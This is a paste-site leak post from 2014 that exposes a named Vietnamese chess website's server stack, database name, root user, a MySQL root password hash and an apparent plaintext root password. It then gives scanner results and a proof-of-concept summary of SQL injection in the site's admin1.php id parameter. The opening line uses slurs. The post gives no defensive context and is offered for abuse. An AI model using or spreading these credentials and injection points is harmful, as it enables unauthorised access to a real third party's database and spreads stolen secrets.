http://xqfan.com/ leaked

a guest
Nov 1st, 2014

http://xqfan.com/ AKA retarded chess games leaked for no reason, enjoy faggots
Version 5.5.38-0ubuntu0.12.04.1
Server Apache/2.2.22 (Ubuntu)
OS debian-linux-gnu
user root@localhost
Database xqfan
root_PasswordHash 317E9221C707F3F74E0B9CAA6AEB40AA63521E48
root password minh08
half of* root_PasswordHash *317E9221C707F3F74E0B9CAA6AEB40AA63521E48
----------------------------------------------------------------------------------

Vulnerability Result

No. 1
ReferURL http://xqfan.com/vn/admin1.php?id=622
Parameter id=622
Type Integer
KWordActionURL Hướng
Vulnerability URL SQL INJECTION
----------------------------------------------------------------------------------

No. 2
ReferURL http://xqfan.com/vn/admin1.php?id=99999999
Parameter id=99999999
Type Integer
KWordActionURL thuật
Vulnerability URL SQL INJECTION
----------------------------------------------------------------------------------

No. 3
ReferURL http://xqfan.com/vn/admin1.php?id=
Parameter id=
Type Search
KWordActionURL ChessFriends
Vulnerability URL SQL INJECTION
----------------------------------------------------------------------------------

Proof Of Concept - SQL INJECTION

Parameter Value
URL http://xqfan.com/vn/admin1.php?id=622
RequestType GET
DatabaseType MySQL
InjectionType Integer
GettingDataBy FieldEcho
----------------------------------------------------------------------------------

Proof Of Concept - Getting Database Structure

----------------------------------------------------------------------------------